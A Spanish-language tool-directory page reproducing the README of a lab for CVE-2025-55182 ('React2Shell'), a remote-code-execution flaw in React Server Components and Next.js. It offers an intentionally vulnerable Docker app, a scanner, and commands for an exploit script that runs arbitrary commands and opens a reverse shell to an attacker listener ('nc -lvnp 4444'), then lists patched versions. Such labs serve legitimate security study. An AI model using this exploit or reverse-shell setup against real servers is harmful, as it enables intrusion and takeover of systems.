Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-55182-poc | Kitploit
Herramientas/GitHubGitHub/mooowu/cve-2025-55182-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de PayloadsLabs y Práctica
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Laboratorio de Análisis de Vulnerabilidad CVE-2025-55182 (React2Shell)

Este repositorio contiene un entorno completo para analizar y reproducir CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en React Server Components (RSC) que afecta a React 19.x y Next.js 15.x.

⚠️ ADVERTENCIA: Este proyecto contiene código vulnerable intencionalmente. NO lo despliegue en un servidor público ni en un entorno de producción.

🔍 Resumen de la Vulnerabilidad

  • CVE ID: CVE-2025-55182
  • Alias: React2Shell
  • Puntuación CVSS: 10.0 (CRÍTICA)
  • Tipo de Vulnerabilidad: CWE-502 (Deserialización de Datos no Confiables)
  • Componentes Afectados:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Mecanismo

La vulnerabilidad reside en cómo el runtime de React Server Components procesa datos serializados de solicitudes HTTP (Server Actions). Un atacante puede crear una carga útil maliciosa del protocolo "Flight" que, al ser deserializada por el servidor, ejecuta código arbitrario antes de que ocurran las comprobaciones de autenticación.

📂 Estructura del Proyecto

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 Comenzando

Requisitos previos

  • Docker y Docker Compose
  • Python 3.x (para ejecutar exploits localmente)

1. Iniciar el Entorno del Laboratorio

Ejecute la aplicación vulnerable en un contenedor aislado:

root@kitploit:~
docker-compose up -d --build

La aplicación estará disponible en http://localhost:3000.

2. Verificar la Aplicación

Visite http://localhost:3000 en su navegador. Debería ver la interfaz "React2Shell Lab" con varios paneles de prueba:

  • Ejecución de Comandos: Probar inyección directa de comandos
  • Deserialización Insegura: Probar exploits de deserialización basados en JSON
  • Lectura Arbitraria de Archivos: Probar path traversal
  • Información del Sistema: Ver detalles del sistema (para verificar el impacto de la RCE)

⚔️ Explotación

Proporcionamos varias herramientas para probar la vulnerabilidad.

Usando el Exploit de Python

  1. Instale los requisitos:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Compruebe si es vulnerable:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Ejecute un comando:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Reverse Shell (requiere un listener, p. ej., nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Usando el Escáner

Escanee instancias vulnerables de React/Next.js:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Mitigación

Para corregir esta vulnerabilidad en sus propias aplicaciones:

  1. Actualice las Dependencias:

    • Actualice React a la versión 19.3.0 o posterior.
    • Actualice Next.js a la versión 15.0.5, 15.1.9 o 16.0.8 según su rama.
  2. Verifique el Parche: Revise package.json para asegurarse de que los paquetes react-server-dom-* estén actualizados.

📝 Aviso Legal

Este proyecto es solo para fines educativos y de investigación en seguridad. Los autores no se hacen responsables del mal uso de este material.

Descargar herramienta